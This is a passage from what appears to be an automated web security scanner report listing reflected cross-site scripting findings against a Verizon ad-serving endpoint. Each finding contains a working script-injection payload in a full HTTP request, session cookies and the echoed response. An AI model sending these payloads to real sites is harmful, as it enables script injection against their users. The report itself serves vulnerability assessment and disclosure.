The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b7c"><script>alert(1)</script>5aa14f10290 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
acking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.38. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b9e"><script>alert(1)</script>c95b9106569 was submitted in the vec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.39. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b92"><script>alert(1)</script>a2d570f147e was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.40. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 830fd"><script>alert(1)</script>3e4bb5b3888 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.41. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0e"><script>alert(1)</script>31b9443c757 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.42. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f54fd"><script>alert(1)</script>ecbc842c8ef was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.43. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f786"><script>alert(1)</script>f1650cfbf93 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search=" target="_top">
...[SNIP]...

3.44. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac813"><script>alert(1)</script>f2c20e38879 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ervice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.45. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c1b"><script>alert(1)</script>6238df5bdc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 360
Content-Type: text/html
Cache-Control: private
Content-Length: 360

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/1294431043/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.46. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c9"><script>alert(1)</script>4b86c156f98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/L15/780459428/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservi
...[SNIP]...

3.47. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd200"a%3d"b"4f3fa442ed1 was submitted in the REST URL parameter 6. This input was echoed as dd200"a="b"4f3fa442ed1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/dd200"a%3d"b"4f3fa442ed1?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PJclQO20erias|O10escOz; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1461
Content-Type: text/html
Cache-Control: private
Content-Length: 1461

